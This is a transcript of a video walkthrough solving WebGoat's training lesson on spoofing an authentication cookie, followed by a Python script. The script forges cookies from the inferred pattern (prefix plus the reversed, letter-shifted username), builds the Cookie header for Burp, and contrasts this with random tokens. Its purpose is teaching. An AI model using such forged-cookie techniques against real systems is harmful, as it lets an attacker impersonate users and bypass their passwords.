Hello everyone, welcome back. Today we're going to go over the solution for WebGoat's session management vulnerability. First, we log in as guest as usual and make sure that Burp Suite's proxy intercept is off. Then we go to Session Management Flaws > Spoof an Authentication Cookie. The scenario here is that we want to log in as two users and look at what the authentication looks like. So let's do that now. Log that in, okay.

Now that we are logged in as the user WebGoat, we turn on intercept on our proxy and do a refresh. This refresh will send the authentication cookie from the browser to the web server, and we will intercept that with Burp. Here we see the auth cookie that the WebGoat user was given when it first logged in; because we did a refresh, the browser is sending this auth cookie back to the server. So let's type that out or remember it, and store it someplace, because the form of it is kind of interesting: 65432 and then a bunch of letters.

Now let's turn off intercept, log out, and sign in with the second user, whose username is aspect. We do the same thing: turn on the intercept functionality in Burp Proxy and do a refresh. That refresh sends the browser's auth cookie back to the web server. Here we have this auth cookie, and it looks eerily similar to the first user's cookie. If you look at the pattern, you'll see that WebGoat's auth cookie is 65432 and then these letters, and aspect's is 65432 once again and then these letters. But if you take the username WebGoat and reverse it, you will see an interesting pattern.
Compare the reversed username against the letter part of WebGoat's cookie and you'll see this pattern: T-U, A-B, O-P, G-H, B-C, E-F, W-X. Interesting. Now let's look at aspect and see if it holds to the same pattern. Take the username aspect, reverse it, and match it against the letter part of its auth cookie: U-D-F-Q-T-B. Once again you see the same pattern: it reverses the username, and then for each character in the reversed username it increases the letter by one in the alphabet. So here we see aspect reversed, and then T-U, C-D, E-F, P-Q, S-T and A-B.

So why don't we do that with alice? We take alice and increment each character by one in the letter order: A to B, L to M, I to J, C to D and E to F. Then we reverse that, and after we reverse it we get F-D-J-M-B. So what happens if we concatenate 65432 and F-D-J-M-B together to get alice's auth cookie? Let's do that now. Turn off intercept, log out, and enter alice as the username; we don't have to give a password, which is the fun part. We turn intercept on and click Log in, and here we have the login traffic intercepted. So why don't we add the auth cookie just like the previous users? We type 645432 and then for alice FDJMB, as we worked out in our notepad. Press Enter and forward that request off to the server.

Let's try that again. Okay: A-B, L-M, I-J, C-D and E-F, yeah. Did I type that right? Let's turn off intercept and do that one more time. alice, intercept is on, Log in, okay.
And we'll add the semicolon and then AuthCookie=65432FDJMB, and forward. Aha, success! Look at that: we've been able to authenticate as alice, and as you can see it says Welcome Alice. We didn't even have to enter the password. So, as you can see, we've been able to spoof an authentication cookie. Thanks for listening.
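As an added worked example (not code from the video or from WebGoat itself), here is the cookie scheme the video reverse-engineers, written out in Python so it can be checked against the two captured cookies and then used to forge a cookie for any username. It assumes the cookie name is AuthCookie and that WebGoat issues the letters in lowercase (the video spells them aloud in uppercase); how the one-letter shift treats 'z' is not shown in the video and is left as a plain code-point increment. The sample cookies below are constructed from the letter patterns read out in the transcript.

```python
"""Forge and verify WebGoat 'Spoof an Authentication Cookie' tokens.

Scheme inferred in the video: cookie = "65432" + reverse(shift_up_one(username)).
"""
from __future__ import annotations

import secrets

PREFIX = "65432"  # constant prefix seen on every captured cookie in the video

# Cookies captured in the video, keyed by the username that produced them.
# Constructed here from the letters read aloud in the transcript; the lesson
# issues them in lowercase (assumption), so they are lowercase here.
OBSERVED = {
    "webgoat": "65432ubphcfx",
    "aspect": "65432udfqtb",
}


def shift(c: str, by: int) -> str:
    """Shift one character by `by` code points (a->b for by=1).

    The video only shows a..y; 'z' is not covered, so no wrap-around is
    applied here (assumption).
    """
    return chr(ord(c) + by)


def spoof_cookie(username: str) -> str:
    """Forge the AuthCookie value for `username` using the inferred scheme."""
    shifted = "".join(shift(c, 1) for c in username)  # a->b, l->m, ...
    return PREFIX + shifted[::-1]                       # then reverse


def recover_username(cookie: str) -> str | None:
    """Invert the scheme: given a captured cookie, return the username it encodes."""
    if not cookie.startswith(PREFIX):
        return None
    body = cookie[len(PREFIX):][::-1]                   # undo the reverse
    return "".join(shift(c, -1) for c in body)          # undo the +1 shift


def hypothesis_holds(samples: dict[str, str]) -> bool:
    """True if every (username, cookie) pair in `samples` matches the scheme.

    This is the check done by eye in the video: two samples were enough to
    confirm the cookie is a deterministic function of the username alone.
    """
    return all(spoof_cookie(user) == cookie for user, cookie in samples.items())


def forge_cookie_header(username: str, jsessionid: str | None = None) -> str:
    """Build the Cookie request header you would paste into Burp's intercept.

    `jsessionid` is the container session id, if the request already carries one.
    """
    parts = []
    if jsessionid:
        parts.append(f"JSESSIONID={jsessionid}")
    parts.append(f"AuthCookie={spoof_cookie(username)}")
    return "Cookie: " + "; ".join(parts)


def secure_session_token(nbytes: int = 32) -> str:
    """What the server should issue instead: a random token unrelated to the username.

    With 32 bytes from the OS CSPRNG there is nothing to reverse-engineer from
    other users' cookies; the server maps token -> user in its own session store.
    """
    return secrets.token_urlsafe(nbytes)


if __name__ == "__main__":
    assert hypothesis_holds(OBSERVED), "captured cookies do not fit the inferred scheme"
    print(forge_cookie_header("alice"))          # Cookie: AuthCookie=65432fdjmb
    print(recover_username(OBSERVED["webgoat"])) # webgoat
    print("random token:", secure_session_token())
```

The security point the video makes is visible in `hypothesis_holds`: once two cookies show that the value depends only on the username and a fixed prefix, no secret is involved, so every user's cookie is derivable and the password check is bypassed entirely. `secure_session_token` is the contrast: a token from a CSPRNG carries no information about the account, so observing any number of cookies tells an attacker nothing about anyone else's.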